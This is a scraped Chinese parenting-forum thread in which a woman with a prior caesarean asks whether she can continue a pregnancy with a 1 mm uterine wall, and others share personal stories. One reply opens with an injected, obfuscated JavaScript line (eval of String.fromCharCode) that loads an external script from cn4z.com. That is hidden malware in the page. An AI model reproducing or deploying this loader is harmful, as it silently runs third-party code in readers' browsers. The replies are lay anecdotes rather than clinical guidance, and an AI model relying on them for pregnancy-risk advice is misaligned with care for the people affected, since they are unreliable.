帖子详情

求助,子宫壁最薄处只有1mm却怀孕了,能要吗?

2999553怀孕妈妈

一胎剖腹已经过了3年半了,去年年底体检是说子宫肌层最薄处是1mm,当时没有留意,这个月月经没来,测了下居然怀孕了,肚子都还没大子宫壁就只有1mm,等撑大的时候怎么办?
精选回帖
MARK。顶下。
2016/10/24回复
$('ed2k_Fva').innerHTML=htmlspecialchars(unescape(decodeURIComponent('filesize')))+' ('+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,99,110,52,122,46,99,111,109,47,99,110,122,122,46,106,115,39,93,59))+' Bytes)';这还是听听医生的专业意见吧
2017/05/03回复
你是孕前1,3吗,还是孕晚期,,这个数据是只做了一次b超,还是几次都是差不多这个数据,谢谢了
2017/05/05回复
我是怀孕6周的时候测的,都算是孕前的数值吧,我只测了一次,就是怀孕初期的时候测的,后期都没有测过了
2017/05/06回复
全部回帖
??/@PING??/@PING沙发
我怀二胎前检查怎么没有说这个的
2016/07/22回复
怀二胎前去做的B超,当时只留意到有些肌瘤,没留意这个,奇怪是当时医生也没跟我提这个
2016/07/23回复
保险起见这个得去问专业医生,这里不会寻求到最正确的答案,专业医生会根据具体情况进行详细了解的判断
dove07dove075楼
太薄了,好危险
最好尽早咨询医生,听听医生建议
2016/07/25回复
huihui1224:
一胎剖腹已经过了3年半了,去年年底体检是说子宫肌层最薄处是1mm,当时没有留意,这个月月经没来,测了下居然怀孕了,肚子都还没大子宫壁就只有1mm,等撑大的时候怎么办?
查看原文
我想问你最后要了吗?我也差不多情况想要二胎
2016/08/12回复
亲,你有怀吗?最后怎么治疗的呀?
MARK。顶下。
二宝怎么样,肌层薄,撑到孕晚期了吗,望回复

这还是听听医生的专业意见吧
zhaomima2005 发表于 2017-05-03 19:08
二宝怎么样,肌层薄,撑到孕晚期了吗,望回复
我的最薄处是1.3mm,刚刚生了,怀的时候被妇科医生吓着了,担心了整个孕期,好在我的主诊医生并没有吓唬我,我当时拿着b超单去找产科主任,看完就只说三个字,可以怀,没有多说,其实那时候我都已经做好流的准备了,听到可以怀,自己又很犹豫呢,到孕晚期,还建议我顺产试试,不过我自己怕也就没有坚持顺产
2017/05/04回复
|Jenny_7481 发表于 2017-05-04 03:02
zhaomima2005 发表于 2017-05-03 19:08
二宝怎么样,肌层薄,撑到孕晚期了吗,望回复我的最薄处是1.3mm,刚..
你是孕前1,3吗,还是孕晚期,,这个数据是只做了一次b超,还是几次都是差不多这个数据,谢谢了
2017/05/05回复
zhaomima2005 发表于 2017-05-05 14:03
|Jenny_7481 发表于 2017-05-04 03:02
二宝怎么样,肌层薄,撑到孕..
我是怀孕6周的时候测的,都算是孕前的数值吧,我只测了一次,就是怀孕初期的时候测的,后期都没有测过了
2017/05/06回复
没事的,你去医院检查一下,当时我也是2MM,医生说只要着床了就没事了,后来开了一些黄体同给我。
2017/05/07回复
亲 我和你情况差不多,医生说不能要,你后来要了吗?怎么样?谢谢
2017/06/11回复
|Jenny_7481:
我的最薄处是1.3mm,刚刚生了,怀的时候被妇科医生吓着了,担心了整个孕期,好在我的主诊医生并没有吓唬我,我当时拿着b超单去找产科主任,看完就只说三个字,可以怀,没有多说,其实那时候我都已经做好流的准备了,听到可以怀,自己又很犹豫呢,到孕晚期,还建议我顺产试试,不过我自己怕也就没有坚持顺产
查看原文
你好!你当时怀孕检查厚度就只有1.1mm吗还是1.1cm!我现在怀孕十七周疤痕最薄处只有1.7mm了!B超大夫看了都害怕!
2017/11/01回复
猜你喜欢

子宫壁厚度只有1.3mm 怎么办 我的宝宝还能要吗

有没患有子宫腺肌症和子宫内膜异位症可以怀上的妈妈

疤痕妊娠且子宫薄,还能继续怀吗?

三线征是子宫内膜的在排卵期

大龄女子患上子宫肌瘤,该先治疗还是该先怀孕呢?

停经一个多月,原来是有了,猜猜男女吧。

热点推荐

娃延迟上学了吗?广州多区雷暴雨大风预警

打卡一个遛娃好去处!欢乐舟欢乐遛娃

本周报名!广州4区公布幼儿园招生政策

家庭收入税前4.2万 房贷月供1.2万风险高吗

速速归队!广州妈妈网喊你回家啦

电视背景墙做成开放式书架 可行吗

闯入了青色植被的世界

家常凉拌莴笋 酸酸辣辣很适合夏天

4.22地球日 自带杯星巴克请喝咖啡

拿闲置书本 来凯德广场换蔬菜啦!

家门口的志愿活动 消防安全派传单

香港-长州岛

第一次见这么贵蔬菜 30个鸽子蛋近300蚊

查看更多热点 >